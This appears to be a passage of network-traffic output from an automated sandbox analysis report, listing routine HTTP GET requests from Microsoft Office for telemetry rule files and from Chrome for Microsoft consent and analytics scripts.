            Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MSCC=NR
            Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
